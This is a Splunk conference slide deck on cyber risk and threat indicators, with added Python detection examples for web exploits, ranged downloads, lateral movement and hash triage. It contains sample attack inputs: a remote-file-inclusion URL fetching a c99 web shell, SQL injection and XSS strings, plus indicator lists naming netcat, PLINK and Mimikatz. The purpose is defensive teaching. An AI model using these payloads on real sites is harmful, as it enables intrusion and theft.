
Page 1: Cyber Risk and Threat Indicators - SplunkConf · 2017. 10. 13.

Cyber Risk and Threat Indicators

Shane Shook, PhD

Chief Knowledge Officer and Global Vice President of Consulting, Cylance

#splunkconf

Page 2

Risk Does Not Equal Threat | Cyber Risks and Threat Indicators

Page 4

Malware – Windows / Linux / OSX (31% didn't use malware)

• Dropper/downloaders – Phishing & Waterholing Malware in Userspace; Zero/Single-day Exploits that lead to…

• Backdoor Trojan RATs – Kernel interactive Service Binaries that mimic legitimate capabilities (RAS/Proxy/AV/Recon/Config)

• BOTNETs – Platforms for MAAS/Subscription Access

• WebShells – Internet-facing Server Backdoor RATs (c99/r57/eval)

Page 5

Hacking – .day Exploits

• Zero day – Vulnerability that only the developer knows about

• ½ day – Vulnerability that is known about but no patches are yet available

• Single day – Vulnerability that is known about and patches are available but not applied

• Forever day – Vulnerability that is known and cannot be patched

Page 6

Hacking – Web Server/Services Exploits

• Remote code execution (watch your .htaccess files!) – register_globals on in PHP | require ($page . ".php"); → http://www.plshackme.com/index.php?page=http://www.ilikeyoursite.com/c99.txt

• SQL injection (watch your user privileges!) – AND / OR in SQL $query | $query = "SELECT * FROM users WHERE username = '' or '1=1'"; → http://www.plshackme.com/site.asp?id=1%20and%201=convert(int,@@version)

• Cross Site Scripting/XSS (watch your syntax!) – Volatile entry in Echo | <?php echo "<p>Your Name <br />"; echo ($_GET[name_1]); ?> → http://www.plshackme.com/clean.php?name_1=<script>HERE_IS_MY_CODE</script>

• Username enumeration (watch your error messages!) – Username guessing | Incorrect logon / password combination

Page 7

Social Engineering – Access, Behavior, and Authority

Subversion
• Contractors
• Employees

Sabotage
• Phishing
• Waterholing
• USB "HoneyDrops" & other free hardware
• "HelpDesk Operators"
• "Visitors" (repairmen, janitors, pizza/flower delivery, tailgaters)

Page 8

Advanced Persistent Threat – Activities

Stage 1 - Compromise
• Social engineering backdoors
• Phishing / waterholing
• Help Desk / visitors
• Web site backdoors
• Reconnaissance

Stage 2 - Exploit
• Privilege escalation
• Lateral movement
• User profile abuse
• Remote access provisioning
• Services bypass/cancellation

Stage 3 - Control
• Configuration management
• Data targeting
• Data exfiltration
• Sabotage
• Subversion

Page 9

Most Commonly Seen Indicators of Data Loss:

• Non-standard packagers (7z, Gz, RAR, PKZIP, etc.)

• Multipart files of particular sizes (250/500Mb)

• "Recycle"/RecycleBin residue

• HTTP 206 status codes on web servers

• Non-standard file transfer services (Filezilla, FTP, WsFTP, etc.)

• Non-standard reverse/proxy services (HUCs, PLINK, NC, SSH, etc.)
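Detection logic for the web-exploit patterns on the "Web Server/Services Exploits" slide (page 6) and for the HTTP 206 indicator on this slide, as an added example that is not part of the deck or of Cylance's Presponse tooling. The access-log lines are constructed for the example (the hostnames reuse the slide's own placeholders); the regular expressions, the three-request threshold and the client addresses are assumptions.

```python
"""Added example (not Presponse code): flag exploit attempts from the deck's
web-exploits slide and ranged (HTTP 206) downloads from its data-loss slide,
over constructed Apache/nginx "combined" access-log lines."""
import re
from collections import defaultdict
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# client ident user [time] "METHOD target HTTP/x" status bytes ...  (rest of line ignored)
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" '
    r'(?P<status>\d{3}) (?P<bytes>\d+|-)'
)

# Constructed sample log (not from the deck). Payloads are the slide's own examples.
SAMPLE_LOG = """\
10.0.0.5 - - [13/Oct/2013:10:01:02 +0000] "GET /index.php?page=home HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.7 - - [13/Oct/2013:10:01:09 +0000] "GET /index.php?page=http://www.ilikeyoursite.com/c99.txt HTTP/1.1" 200 311 "-" "curl/7.29"
198.51.100.7 - - [13/Oct/2013:10:01:15 +0000] "GET /site.asp?id=1%20and%201=convert(int,@@version) HTTP/1.1" 500 842 "-" "curl/7.29"
203.0.113.9 - - [13/Oct/2013:10:02:40 +0000] "GET /clean.php?name_1=%3Cscript%3EHERE_IS_MY_CODE%3C/script%3E HTTP/1.1" 200 240 "-" "Mozilla/5.0"
10.0.0.5 - - [13/Oct/2013:11:15:00 +0000] "GET /exports/q3.zip HTTP/1.1" 206 262144000 "-" "Wget/1.14"
10.0.0.5 - - [13/Oct/2013:11:18:30 +0000] "GET /exports/q3.zip HTTP/1.1" 206 262144000 "-" "Wget/1.14"
10.0.0.5 - - [13/Oct/2013:11:22:05 +0000] "GET /exports/q3.zip HTTP/1.1" 206 262144000 "-" "Wget/1.14"
10.0.0.5 - - [13/Oct/2013:11:25:41 +0000] "GET /exports/q3.zip HTTP/1.1" 206 104857600 "-" "Wget/1.14"
"""

SQLI_RE = re.compile(r"\b(and|or)\b\s+['\d]")   # AND / OR appended to $query (slide 6)


def classify_exploit_attempt(target):
    """Return the exploit class a request target suggests, or None.
    Values are URL-decoded before matching so %20-style encoding cannot hide the pattern."""
    parts = urlsplit(target)
    for _name, value in parse_qsl(parts.query, keep_blank_values=True):
        v = unquote_plus(value).lower()
        if v.startswith(("http://", "https://", "ftp://")):
            return "remote-file-inclusion"   # require($page . ".php") with register_globals
        if "<script" in v:
            return "xss"                     # echo($_GET[name_1]) without escaping
        if SQLI_RE.search(v) or "@@version" in v or "'1=1" in v:
            return "sql-injection"
    return None


def analyse(log_text):
    """Return (exploit attempts, per-client HTTP 206 summary) for a block of log lines."""
    attempts = []                                  # (client, class, target)
    partial = defaultdict(lambda: {"requests": 0, "bytes": 0, "paths": set()})
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                               # unparseable line: skip, do not crash
        client, target = m["client"], m["target"]
        kind = classify_exploit_attempt(target)
        if kind:
            attempts.append((client, kind, target))
        if m["status"] == "206":                   # Partial Content: ranged/resumed download
            rec = partial[client]
            rec["requests"] += 1
            rec["bytes"] += int(m["bytes"]) if m["bytes"] != "-" else 0
            rec["paths"].add(urlsplit(target).path)
    return attempts, dict(partial)


def partial_content_alerts(partial, min_requests=3):
    """Clients that pulled a file in several ranged chunks, the 206 pattern the deck lists
    as a data-loss indicator. The threshold is an assumption for this example."""
    return {c: r for c, r in partial.items() if r["requests"] >= min_requests}


if __name__ == "__main__":
    found, ranged = analyse(SAMPLE_LOG)
    for client, kind, target in found:
        print(f"{kind:22s} {client:14s} {target}")
    for client, rec in partial_content_alerts(ranged).items():
        print(f"206 x{rec['requests']} {rec['bytes']} bytes from {client}: {sorted(rec['paths'])}")
```

The 206 count alone is noisy on a site that serves large media, so the per-client byte total and the set of paths are kept alongside it; in a Splunk saved search the same idea is a count and sum by client over a short window.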

Page 10

Most Commonly Seen Indicators of Sabotage:

• Unusual Prefetch / Recent / LNK / Bash binary execution history

• AT / CRON jobs

• Scripts

• Services cancellation

• User profile authority changes

Page 11

Most Commonly Seen Indicators of User Profile Abuse:

• Multiple user accounts on single computer

• User account on multiple computers

• Service & administrative account propagation

• Extranet LDAP/AD account use

• Account privilege provisioning/modifications (SuSID, MD5, Admins etc.)

• Local services history (MIMIKATZ, PWDUMP, L0pht, CAIN/ABEL)

Page 12

Most Commonly Seen Indicators of Lateral Movement:

• Access history (Type 3 / 4 / 8 / 10 logins, AuthLog)

• MSTSC history (.RDP, .BMC)

• Remote job scheduling (AT, SC, WMIC, SSH)

• Redundant & non-standard RAS tools (VNC, LogMeIn, TeamViewer, NC, PUTTY, PSEXEC, *FTP, SCP)

• Domain services history (DSGET, DSQUERY, HYENA)

• Reconnaissance tools (FPORT, NET/NET1, NETSH, PING)
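The user-profile-abuse checks from the previous slide (page 11: several accounts on one computer, one account on many computers) and the Type 3/4/8/10 logon check from this slide, as an added example that is not Presponse's code. It runs over constructed Windows Security 4624 logon events exported as CSV; the column layout, hostnames, accounts, addresses and thresholds are all assumptions for the example.

```python
"""Added example (not Presponse code): logon-history checks behind the deck's
"User Profile Abuse" and "Lateral Movement" slides, over constructed 4624 events."""
import csv
import io
from collections import defaultdict

# Logon types the deck calls out on the lateral-movement slide:
# 3 = network, 4 = batch (scheduled task), 8 = NetworkCleartext, 10 = RemoteInteractive (RDP)
LATERAL_LOGON_TYPES = {3, 4, 8, 10}

# Constructed sample export (hostnames, users and addresses are made up).
SAMPLE_4624 = """\
time,host,user,logon_type,source_ip
2013-10-13T08:01:00,WS-ALICE,alice,2,-
2013-10-13T08:05:00,WS-BOB,bob,2,-
2013-10-13T09:10:00,WS-BOB,svc_backup,3,10.0.0.50
2013-10-13T09:11:00,WS-CAROL,svc_backup,3,10.0.0.50
2013-10-13T09:12:00,FS-01,svc_backup,10,10.0.0.50
2013-10-13T09:13:00,FS-01,svc_backup,4,-
2013-10-13T09:30:00,WS-ALICE,bob,10,10.0.0.22
2013-10-13T09:31:00,WS-ALICE,svc_backup,3,10.0.0.50
"""


def load_events(csv_text):
    """Parse the CSV export into dicts; logon_type becomes an int so set membership works."""
    rows = list(csv.DictReader(io.StringIO(csv_text)))
    for r in rows:
        r["logon_type"] = int(r["logon_type"])
    return rows


def accounts_per_host(events):
    """Slide 11, first bullet: which accounts have logged on to each computer."""
    m = defaultdict(set)
    for e in events:
        m[e["host"]].add(e["user"])
    return {h: sorted(u) for h, u in m.items()}


def hosts_per_account(events):
    """Slide 11, second bullet: on how many computers each account has been used."""
    m = defaultdict(set)
    for e in events:
        m[e["user"]].add(e["host"])
    return {u: sorted(h) for u, h in m.items()}


def profile_abuse_report(events, max_accounts_per_host=2, max_hosts_per_account=2):
    """Accounts crowding one host and accounts spread across hosts (service/admin account
    propagation). Both thresholds are assumptions; tune them to the environment's baseline."""
    crowded = {h: u for h, u in accounts_per_host(events).items() if len(u) > max_accounts_per_host}
    spread = {u: h for u, h in hosts_per_account(events).items() if len(h) > max_hosts_per_account}
    return {"crowded_hosts": crowded, "propagated_accounts": spread}


def lateral_movement_candidates(events, min_hosts=2):
    """Slide 12, first bullet: accounts whose Type 3/4/8/10 logons touch several hosts, with
    the source addresses those logons came from. min_hosts is an assumed threshold."""
    touched = defaultdict(set)
    sources = defaultdict(set)
    for e in events:
        if e["logon_type"] in LATERAL_LOGON_TYPES:
            touched[e["user"]].add(e["host"])
            if e["source_ip"] != "-":
                sources[e["user"]].add(e["source_ip"])
    return {u: {"hosts": sorted(h), "sources": sorted(sources[u])}
            for u, h in touched.items() if len(h) >= min_hosts}


if __name__ == "__main__":
    ev = load_events(SAMPLE_4624)
    print(profile_abuse_report(ev))
    print(lateral_movement_candidates(ev))
```

A single source address reaching several hosts under one service account, as in the sample, is the shape to look for; the same account logging on interactively (Type 2) everywhere would instead point at the "user profile authority changes" bullet on the sabotage slide.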

Page 13

Most Commonly Seen Indicators of Insider Threats:

• Unusual profile access and use history
  • Time
  • HostID
  • Application history
  • Configuration history

• RBAC violations

• Other acceptable use policy violations

• Malware / PUP / PUM…

Page 14

Most Common Malware Identifiers:

• Authority – service, administrator, or user

• Persistence – only 4 persistence mechanisms in Windows

• Communications – only 44 netsvcs keys in Windows Services

• Functionality – user and kernel combinations are rare

• File System – user or system

Page 15

Cylance Presponse™ Method

Scope of the Investigation / Coverage of the IT Environment: File and Operating System Audit, Network Logs Audit, Host Memory Analysis, Host Disk Forensics, Network Forensics

Phase 1 (Diagnose) → Phase 2 (Assess) → Phase 3 (Collect)

Collection: Windows.bat, Linux.sh, OSX.sh

Processing: Presponse.py • Extraction • Parsing • Normalization • Transform • Load

Analysis: SQL, Excel PowerPivot

Reporting: Compromise Assessment, Exhibits

Page 16

Cylance Infinity – Machine Learning for Advanced Detection

Page 17

Cylance Infinity API – Submit Files or Lookup Hashes

Page 18

Presponse on Splunk

Splunk Universal Forwarder
• Scripted input collection of Presponse Phase 1 data
• Leverage the existing Splunk deployment
• Managed via the Splunk Development Server

Presponse App
• Saved searches
  ✓ Data loss or sabotage
  ✓ User profile propagation
  ✓ Lateral movement
  ✓ Malware and IOCs
  ✓ Build and application inconsistencies
• Dashboards, form searches and other views
• Field extractions
• Lookups (e.g. Infinity)

SourceTypes
• Processes
  ✓ Executable path
  ✓ Modules
  ✓ Handles
  ✓ Connections
• Services
• Autoruns
• Tasks
• Prefetch
• Filesystem
• User profiles

Page 19

Infinity External Lookup Add-on

• Reusable Splunk component that packages an external lookup script based on py2INFINITY

• Lookup SHA-256 (and soon MD5) hashes in sourcetypes

• Extend with file upload/response capability

Page 20

1. What files are known bad?
2. What files are unknown?
3. Where are the files located in FS?
4. How many computers are they on?
5. When were they created?
6. Who used them?

• Malware is only an indicator, not a threat

• It is a risk that should be evaluated by related user history

• A threat is determined by the impact it had or may have on the business
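The shape of the external lookup script from the previous slide (page 19) and the six triage questions from this slide, as an added example that is not the py2INFINITY add-on's or Presponse's code. Splunk's external lookup contract is real (the script is handed the lookup field names as arguments, reads CSV with those columns on stdin and writes the same columns back with the output field filled); everything else is an assumption for the example: the script name infinity_lookup.py, the verdict table that stands in for the Infinity API call, the placeholder hash values and the constructed file inventory.

```python
"""Added example (not py2INFINITY or Presponse code): a Splunk external lookup that
fills a verdict field from a SHA-256, and a triage that answers the deck's six
questions (known bad? unknown? where? how many computers? when? who?)."""
import csv
import io
import sys
from collections import defaultdict

# Constructed stand-in for Infinity API answers: sha256 -> verdict.
# The hash values are obvious placeholders, not real file hashes.
VERDICTS = {
    "0" * 64: "bad",
    "1" * 64: "good",
}


def lookup_csv(in_text, table=VERDICTS, key_field="sha256", out_field="verdict"):
    """Fill out_field for every input row. A hash absent from the table is 'unknown',
    which the next slide treats as a question to answer, not as 'good'."""
    reader = csv.DictReader(io.StringIO(in_text))
    out = io.StringIO()
    writer = csv.DictWriter(out, fieldnames=reader.fieldnames, lineterminator="\n")
    writer.writeheader()
    for row in reader:
        row[out_field] = table.get(row.get(key_field, "").lower(), "unknown")
        writer.writerow(row)
    return out.getvalue()


def main(argv=sys.argv):
    # transforms.conf (hypothetical stanza): external_cmd = infinity_lookup.py sha256 verdict
    key_field, out_field = argv[1], argv[2]
    sys.stdout.write(lookup_csv(sys.stdin.read(), key_field=key_field, out_field=out_field))


# Constructed file inventory: Filesystem sourcetype joined with user-profile data.
# Columns: host, path, sha256, created (ISO date), user
INVENTORY = [
    ("WS-ALICE", r"C:\Users\alice\AppData\Local\Temp\svchost.exe", "0" * 64, "2013-10-01", "alice"),
    ("WS-BOB", r"C:\Users\bob\AppData\Local\Temp\svchost.exe", "0" * 64, "2013-10-03", "bob"),
    ("FS-01", r"C:\Windows\System32\svchost.exe", "1" * 64, "2012-05-11", "SYSTEM"),
    ("WS-CAROL", r"C:\Users\carol\Downloads\update.exe", "2" * 64, "2013-10-12", "carol"),
]


def triage(inventory, table=VERDICTS):
    """Group the inventory by hash and answer the six questions per hash, ordered by
    urgency: bad verdicts first, then unknown, good last; wider spread first within a verdict."""
    by_hash = defaultdict(lambda: {"paths": set(), "hosts": set(), "users": set(),
                                   "first_created": None})
    for host, path, sha256, created, user in inventory:
        rec = by_hash[sha256]
        rec["paths"].add(path)            # where in the FS
        rec["hosts"].add(host)            # how many computers
        rec["users"].add(user)            # who used them
        if rec["first_created"] is None or created < rec["first_created"]:
            rec["first_created"] = created    # when created (earliest sighting)
    rank = {"bad": 0, "unknown": 1, "good": 2}
    rows = []
    for h, r in by_hash.items():
        rows.append({"sha256": h, "verdict": table.get(h, "unknown"),
                     "host_count": len(r["hosts"]), "hosts": sorted(r["hosts"]),
                     "paths": sorted(r["paths"]), "first_created": r["first_created"],
                     "users": sorted(r["users"])})
    rows.sort(key=lambda r: (rank[r["verdict"]], -r["host_count"]))
    return rows


if __name__ == "__main__":
    if len(sys.argv) == 3:
        main()                              # invoked by Splunk as an external lookup
    else:
        for row in triage(INVENTORY):
            print(row["verdict"], row["host_count"], row["first_created"], row["users"])
```

The ordering encodes the slide's point: the verdict alone is an indicator, and the user history joined onto it (which accounts, on how many machines, since when) is what turns it into a risk worth assessing.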

Page 26

When is a Risk a Threat?

Risk | Threat
Unpatched software | Vulnerable to exploits
".”day exploit | Used in place of malware
Malware | Used to reconnoiter or sabotage systems
Uncontrolled access | Persistent access to non-public information
Undocumented systems | Lack of awareness
Tools vs. experience | Lack of perspective
Outsourcing | Lack of control

Page 27

[email protected] | Cyber Risks and Threat Indicators

Page 28

Next Steps

1. Download the .conf2013 Mobile App – If not iPhone, iPad or Android, use the Web App

2. Take the survey & WIN A PASS FOR .CONF2014… Or one of these bags!

3. Check out the other "Using Splunk" presentations – All PPTs are in the Mobile App; Videos will be uploaded shortly